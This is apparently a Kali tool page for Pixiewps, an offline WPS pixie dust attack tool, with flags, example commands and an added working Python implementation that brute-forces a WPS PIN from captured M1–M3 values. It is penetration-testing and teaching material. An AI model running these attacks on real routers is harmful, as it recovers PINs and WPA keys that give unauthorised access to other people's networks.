
Pixiewps

Pixiewps is an offline WPS bruteforce tool that exploits low or non-existing entropy in some Access Points using the pixie dust attack. It recovers WPS PINs and WPA-PSK from captured WPS handshake data.

Description

Pixiewps is a C tool, written for educational purposes, that performs offline bruteforce attacks against Wi-Fi Protected Setup (WPS). It implements the pixie dust attack, which targets Access Points whose WPS implementation draws the secret nonces E-S1 and E-S2 (and, on some chipsets, the Diffie-Hellman private key as well) from a predictable or low-entropy source. Once a single WPS exchange has been captured up to M3 (enrollee and registrar public keys, the E-Hash1/E-Hash2 values and the nonces), the PIN is recovered entirely offline, with no further interaction with the AP.

Use cases include testing WPS-enabled routers for pixie dust vulnerabilities during wireless penetration testing. It is used alongside Reaver or Bully, which perform the online part of the exchange and print the captured values; Pixiewps then processes them offline in seconds instead of the many hours an online PIN bruteforce can take. The tool supports several modes, each targeting the PRNG behaviour of a particular AP firmware family: RT/MT/CL (Ralink/MediaTek/Celeno), the eCos variants (Broadcom) and RTL819x (Realtek).

In mode 3 the tool can additionally recover the authentication session key, the enrollee's secret nonces and the contents of the Encrypted Settings attribute carried in M5 and M7, which yields the AP's WPA-PSK. Because RTL819x seeds its PRNG from the current time, --start and --end bound the date range that mode 3 searches.

How It Works

In a WPS exchange the enrollee (the AP) proves knowledge of the PIN with two hashes sent in M3: E-Hash1 = HMAC(AuthKey, E-S1 || PSK1 || PKE || PKR) and E-Hash2 = HMAC(AuthKey, E-S2 || PSK2 || PKE || PKR), where PSK1 and PSK2 are derived from the two halves of the PIN and E-S1, E-S2 are 128-bit secret nonces that are supposed to be random. If the secret nonces can be predicted, anyone who knows AuthKey can bruteforce the first PIN half (10,000 candidates) against E-Hash1 and the second half (1,000 candidates, the last digit being a checksum) against E-Hash2, entirely offline. Pixiewps takes PKE (from M1), PKR (from M2), E-Hash1/E-Hash2 (from M3), the nonces, the BSSID and optionally the Encrypted Settings from M5/M7, and applies vendor-specific predictions of E-S1/E-S2: mode 1 (RT/MT/CL) assumes both are zero; mode 2 (eCos simple) derives them from the same linear congruential generator that produced the enrollee nonce; mode 3 (RTL819x) bruteforces the time-based seed of the PRNG that produced the enrollee nonce, which on those devices also yields the enrollee's DH private key and therefore the session keys. AuthKey itself is derived from the DH shared secret, both nonces and the BSSID; it is either supplied with -a, or computed by Pixiewps when the registrar used a small DH private key (PKR = 2, so the shared secret is simply PKE) and the nonces and BSSID are given. In mode 3 the secret nonces can also be recovered from the encrypted settings, and the PIN is computed if the hashes are provided.
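The derivation above, carried through end to end in an added example that is not part of Pixiewps or of the original page: a constructed M1-M3 capture from an AP that behaves like the mode 1 (RT/MT/CL) case, i.e. E-S1 = E-S2 = 0, with the registrar using the small DH private key 1 (PKR = 2, what Reaver's --dh-small does), followed by the offline recovery of the PIN. The BSSID, nonces and PIN are constructed sample values; the key schedule (DHKey, KDK, the WPS KDF and the E-Hash construction) follows the WPS specification.

```python
import hashlib
import hmac
import os

# 1536-bit MODP group (RFC 3526 group 5) used by WPS; the generator is 2.
WPS_P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF", 16)
WPS_G = 2
KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"


def wps_kdf(key: bytes, label: bytes, total_bits: int) -> bytes:
    """WPS key derivation: counter-mode HMAC-SHA256 over (i || label || total_bits)."""
    out = b""
    for i in range(1, (total_bits + 255) // 256 + 1):
        msg = i.to_bytes(4, "big") + label + total_bits.to_bytes(4, "big")
        out += hmac.new(key, msg, hashlib.sha256).digest()
    return out[: total_bits // 8]


def session_keys(shared_secret: int, e_nonce: bytes, e_bssid: bytes, r_nonce: bytes):
    """AuthKey (32 B) and KeyWrapKey (16 B) from the DH shared secret, nonces and BSSID."""
    dhkey = hashlib.sha256(shared_secret.to_bytes(192, "big")).digest()
    kdk = hmac.new(dhkey, e_nonce + e_bssid + r_nonce, hashlib.sha256).digest()
    keys = wps_kdf(kdk, KDF_LABEL, 640)          # AuthKey || KeyWrapKey || EMSK
    return keys[:32], keys[32:48]


def pin_checksum(seven_digits: str) -> str:
    """Checksum digit appended to the first 7 digits of a WPS PIN (weights 3,1,3,1,3,1,3)."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(seven_digits))
    return str((10 - acc % 10) % 10)


def e_hash(authkey: bytes, secret_nonce: bytes, pin_half: str, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/2 as sent in M3: HMAC(AuthKey, E-S || PSK || PKE || PKR), PSK = HMAC(AuthKey, half)[:16]."""
    psk = hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]
    return hmac.new(authkey, secret_nonce + psk + pke + pkr, hashlib.sha256).digest()


def vulnerable_enrollee(pin: str) -> dict:
    """Constructed M1-M3 capture from an AP whose firmware sets E-S1 = E-S2 = 0 (the mode 1 flaw).
    The registrar side uses private key 1, so PKR = 2 exactly as with Reaver's --dh-small."""
    e_bssid = bytes.fromhex("001122334455")             # constructed BSSID
    e_nonce, r_nonce = os.urandom(16), os.urandom(16)    # the public nonces are fine
    a = 2 + int.from_bytes(os.urandom(190), "big")       # AP's DH private key (not the weakness here)
    pke = pow(WPS_G, a, WPS_P).to_bytes(192, "big")
    pkr = pow(WPS_G, 1, WPS_P).to_bytes(192, "big")      # --dh-small: registrar private key = 1
    shared = pow(int.from_bytes(pkr, "big"), a, WPS_P)
    authkey, _ = session_keys(shared, e_nonce, e_bssid, r_nonce)
    es1 = es2 = bytes(16)                                # the flaw: zero secret nonces
    return {
        "pke": pke, "pkr": pkr, "e_nonce": e_nonce, "r_nonce": r_nonce, "e_bssid": e_bssid,
        "e_hash1": e_hash(authkey, es1, pin[:4], pke, pkr),
        "e_hash2": e_hash(authkey, es2, pin[4:], pke, pkr),
    }


def pixie_dust_mode1(cap: dict):
    """Offline PIN recovery from M1-M3 when E-S1 = E-S2 = 0 and PKR = 2.
    With PKR = g^1 the shared secret is simply PKE, so AuthKey is computable without -a."""
    shared = int.from_bytes(cap["pke"], "big")            # PKE^1 mod p
    authkey, _ = session_keys(shared, cap["e_nonce"], cap["e_bssid"], cap["r_nonce"])
    zero = bytes(16)
    first = next((f"{i:04d}" for i in range(10000)        # 10,000 candidates for the first half
                  if e_hash(authkey, zero, f"{i:04d}", cap["pke"], cap["pkr"]) == cap["e_hash1"]), None)
    if first is None:
        return None
    for i in range(1000):                                 # 3 free digits + checksum: 1,000 candidates
        second = f"{i:03d}" + pin_checksum(first + f"{i:03d}")
        if e_hash(authkey, zero, second, cap["pke"], cap["pkr"]) == cap["e_hash2"]:
            return first + second
    return None


if __name__ == "__main__":
    capture = vulnerable_enrollee("04847533")
    print("recovered WPS PIN:", pixie_dust_mode1(capture))
```

The whole search is 11,000 HMAC evaluations, which is why the attack completes in well under a second once the capture is in hand. An AP whose E-S1/E-S2 are not constant but follow the nonce PRNG (modes 2 and 3) needs the corresponding generator in place of the `zero` value; the surrounding key schedule is unchanged.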

Installation

bash
sudo apt install pixiewps

Flags

-e, --pke            Enrollee's DH public key, found in M1.
-r, --pkr            Registrar's DH public key, found in M2.
-s, --e-hash1        Enrollee hash-1, found in M3. It's the hash of the first half of the PIN.
-z, --e-hash2        Enrollee hash-2, found in M3. It's the hash of the second half of the PIN.
-a, --authkey        Authentication session key. Can be avoided by specifying small Diffie-Hellman keys and --e-nonce, --r-nonce, --e-bssid.
-n, --e-nonce        Enrollee's nonce, found in M1.
-m, --r-nonce        Registrar's nonce, found in M2. Used with other parameters to compute the session keys.
-b, --e-bssid        Enrollee's BSSID. Used with other parameters to compute the session keys.
-S, --dh-small       Small Diffie-Hellman keys, i.e. PKR = 2 (deprecated). The same option must be specified in Reaver too.
--mode N[,... N]     Select modes, comma separated: 1 (RT/MT/CL), 2 (eCos simple), 3 (RTL819x), 4 (eCos simplest) [Experimental], 5 (eCos Knuth) [Experimental]. Modes are selected automatically when the option is omitted.
--start [mm/]yyyy    Starting date for mode 3.
--end [mm/]yyyy      Ending date for mode 3.
-7, --m7-enc         Encrypted settings, found in M7. Recover Enrollee's WPA-PSK and secret nonce 2 (mode 3).
-5, --m5-enc         Encrypted settings, found in M5. Recover Enrollee's secret nonce 1. Use with --m7-enc.

Examples

Full pixie dust attack recovering the WPS PIN 04847533: the AuthKey, both public keys, both hashes and the enrollee nonce are supplied, and the mode is chosen automatically since --mode is omitted. The tool prints the derived PSK values, the recovered PIN and the time taken.
pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec -n 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
Attack without -a: with -S the registrar key is taken to be PKR = 2 (Reaver must have been run with the same option), so the AuthKey is computed from PKE, the enrollee and registrar nonces and the BSSID.
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -S -n <e-nonce> -m <r-nonce> -b <e-bssid>
Mode 3 attack recovering WPA-PSK and secret nonce 2 from M7 encrypted settings.
pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> --mode 3
Mode 3 attack recovering secret nonce 1 from M5 encrypted settings along with M7.
pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> --mode 3
Full mode 3 attack also recovering WPS PIN using E-Hash1 and E-Hash2 with M5/M7 encrypted settings.
pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> -s <e-hash1> -z <e-hash2> --mode 3
Display help and full argument descriptions for Pixiewps 1.4.
pixiewps --help
Attack using the authentication key, public keys and E-Hashes without nonces (requires a modified Reaver/Bully build that outputs the AuthKey).
pixiewps -a <authkey> -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2>
Updated 2026-04-16. Source: kali.org